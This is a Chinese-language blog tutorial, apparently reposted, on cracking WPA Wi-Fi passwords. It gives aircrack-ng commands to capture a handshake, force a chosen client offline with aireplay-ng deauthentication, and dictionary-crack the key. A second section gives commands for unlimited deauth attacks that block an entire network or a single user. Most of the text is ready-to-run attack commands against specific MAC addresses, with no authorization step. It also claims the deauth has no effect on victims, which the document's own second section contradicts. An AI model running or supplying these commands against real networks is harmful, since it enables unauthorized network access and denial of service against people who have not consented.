wifi弱口令检查(2)
密碼破解
1.無線網卡切換到監聽模式 ?具體參考:https://blog.csdn.net/whatday/article/details/86494254
2.airodump-ng wlan0
列出所有的wifi信號 得到需要破解的wifi對應的mac 如圖?
這里選取 ?B0:95:8E:9B:7C:E8這個wifi設備
3.airodump-ng wlan0 --ivs -c 6 --bssid B0:95:8E:9B:7C:E8 -w test?
抓取wifi的握手數據包 同時使用第4步讓指定用戶斷開 這樣拿到握手包
--ivs 是通過ivs過濾,只保留可以破解密碼的報文.ivs文件,這樣比較快點
-c 后面跟頻道,如這里的6?
-w 是將抓取的報文寫入命名為 test 并保存(之后會在當前文件夾保存為test-01.ivs)
4.新開一個shell執行 aireplay-ng -0 200 -c 84:4B:F5:49:53:BA -a B0:95:8E:9B:7C:E8 wlan0
針對指定wifi的mac 指定的用戶進行攻擊 讓用戶斷開wifi 當用戶重連時 第3步中的命令可以抓到握手包
需要注意 由于用戶wifi斷開后會自動重連 所以用戶端基本沒有感覺 也不能對攻擊用戶造成任何影響
-a 是路由器的mac
-c 是需要攻擊的用戶mac
-0 是攻擊次數
5. aircrack-ng -w pass.txt test-01.ivs
-w 是字典文件
test-01.ivs 是包含握手包的數據包
如果失敗會顯示:Got no data packets from target network!
成功會顯示:
?
攻擊
1.查看本地無線網卡名稱?
2.列出所有的wifi信號?airodump-ng wlan0
3.查看需要攻擊的wifi的 BSSID(mac) 和 CH(信道), 這里選擇wifi的BSSID是B0:95:8E:9B:7C:E8??信道是6
4.設置本地網卡信道?iwconfig wlan0 channel 6
攻擊整體wifi?
? ? ? ? ?aireplay-ng -0 0 -a B0:95:8E:9B:7C:E8 wlan0???攻擊效果是此wifi不能連接?
? ? ? ? -0 是攻擊次數?0表示無限次
? ? ? ? wlan0 是本地無線網卡名稱
攻擊對應wifi的單一用戶?
? ? ? ? ?1.airodump-ng wlan0 -c 6 --bssid B0:95:8E:9B:7C:E8 得到連接該wifi的用戶mac列表
? ? ? ? ?-c 是信道,如這里的6
? ? ? ? 2.aireplay-ng -0 0 -c 84:A1:34:B2:2A:F6?-a B0:95:8E:9B:7C:E8 wlan0
? ? ? ? ?-c 是需要攻擊的用戶mac
? ? ? ? ?-a 是需要攻擊的wifi的BSSID
? ? ? ? ?-0 是攻擊次數 0表示無限次 如果設置200 攻擊完200此后將停止,該用戶會自動再次連接上該wifi
? ? ? ? ?wlan0 是本地無線網卡名稱
?
?
?
總結
以上是生活随笔為你收集整理的wifi弱口令检查(2)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: openssl 对文本加密解密
- 下一篇: docker常用参数详解,docker